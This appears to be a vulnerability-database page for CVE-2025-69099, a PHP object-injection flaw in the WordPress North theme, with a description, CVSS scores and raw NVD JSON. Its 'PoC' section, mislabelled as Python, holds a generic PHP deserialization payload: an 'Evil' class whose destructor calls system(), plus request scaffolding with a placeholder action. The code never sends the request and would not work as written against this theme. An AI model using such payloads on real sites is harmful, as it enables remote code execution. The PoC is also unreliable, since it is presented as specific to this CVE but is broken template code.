Security Vulnerability Report
中文
CVE-2025-69099 CVSS 8.8 HIGH

CVE-2025-69099

Published: 2026-01-22 17:16:23
Last Modified: 2026-04-15 00:35:42

Description

Deserialization of Untrusted Data vulnerability in fuelthemes North north-wp allows Object Injection.This issue affects North: from n/a through <= 5.7.5.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

North Theme (WordPress) <= 5.7.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // CVE-2025-69099 PoC - WordPress North Theme Object Injection // Requires low-privilege access (subscriber or higher) // Example POP chain gadget for demonstration class Evil { public $cmd; public function __destruct() { system($this->cmd); } } // Generate malicious serialized payload $evil = new Evil(); $evil->cmd = 'id > /tmp/pwned'; $payload = serialize($evil); // Alternative: Using base64 encoding for obfuscation $encoded_payload = base64_encode($payload); // Send payload via WordPress AJAX or REST API endpoint $target_url = 'https://target-site.com/wp-admin/admin-ajax.php'; $post_data = [ 'action' => 'north_ajax_action', // Replace with actual vulnerable action 'unsafe_data' => $payload ]; // Using WordPress REST API $api_url = 'https://target-site.com/wp-json/wp/v2/posts'; $headers = [ 'Authorization' => 'Basic ' . base64_encode('user:password'), 'Content-Type' => 'application/json' ]; // Note: Actual exploitation requires identifying the vulnerable endpoint // Check for theme options, custom post types, or AJAX handlers echo "Payload: " . $encoded_payload . "\n"; echo "Decoded: " . $payload . "\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69099", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:22.697", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of Untrusted Data vulnerability in fuelthemes North north-wp allows Object Injection.This issue affects North: from n/a through <= 5.7.5."}, {"lang": "es", "value": "Vulnerabilidad de deserialización de datos no confiables en fuelthemes North north-wp permite la inyección de objetos. Este problema afecta a North: desde n/a hasta &lt;= 5.7.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/north-wp/vulnerability/wordpress-north-theme-5-7-5-php-object-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}